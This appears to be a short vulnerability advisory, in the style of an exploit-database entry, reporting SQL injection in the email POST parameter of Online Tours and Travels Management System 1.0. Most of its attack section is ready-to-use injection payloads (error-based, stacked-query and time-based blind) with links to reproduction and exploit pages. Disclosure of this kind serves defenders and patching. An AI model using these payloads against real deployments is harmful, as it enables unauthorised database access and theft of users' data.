Headline
Online Tours And Travels Management System 1.0 SQL Injection
Online Tours and Travels Management System version 1.0 suffers from a remote SQL injection vulnerability.
## Titles: Travel-Manager-OTMSP-1.0 Multiple SQLi## Author: nu11secur1ty## Date: 05/01/2024## Vendor: https://mayurik.com/## Software: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the email parameter, and a databaseerror message was returned. Two single quotes were then submitted andthe error message disappeared. The attacker can get all informationfrom the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: email (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: [email protected]' AND (SELECT 8987FROM(SELECT COUNT(*),CONCAT(0x717a716b71,(SELECT(ELT(8987=8987,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# DdfP&send_email= Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: [email protected]';SELECT SLEEP(7)#&send_email= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 9208FROM (SELECT(SLEEP(7)))pkFu)# nfTm&send_email=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Travel-Manager-OTMSP-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/05/travel-manager-otmsp-10-multiple-sqli.html)## Time spent:00:35:00